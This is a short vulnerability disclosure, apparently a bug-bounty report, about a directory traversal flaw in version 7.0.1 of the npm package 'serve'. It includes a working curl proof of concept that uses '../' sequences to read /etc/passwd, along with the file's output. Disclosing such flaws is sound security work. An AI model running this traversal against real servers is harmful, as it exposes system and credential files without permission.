I would like to report a Server Directory Traversal vulnerability in serve.
It allows reading local files on the target server.
module name: serve
version: 7.0.1
npm page: https://www.npmjs.com/package/serve
Assuming you would like to serve a static site, single page application or just a static file (no matter if on your device or on the local network), this package is just the right choice for you.
It behaves exactly like static deployments on Now, so it’s perfect for developing your static project. Then, when it’s time to push it into production, you deploy it.
Furthermore, it also provides a neat interface for listing the directory's contents.
$ npm i serve
$ ./node_modules/serve/bin/serve.js
Read /etc/passwd on the target server:

$ curl --path-as-is 'http://127.0.0.1:3000/../../../../../../etc/passwd'
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
...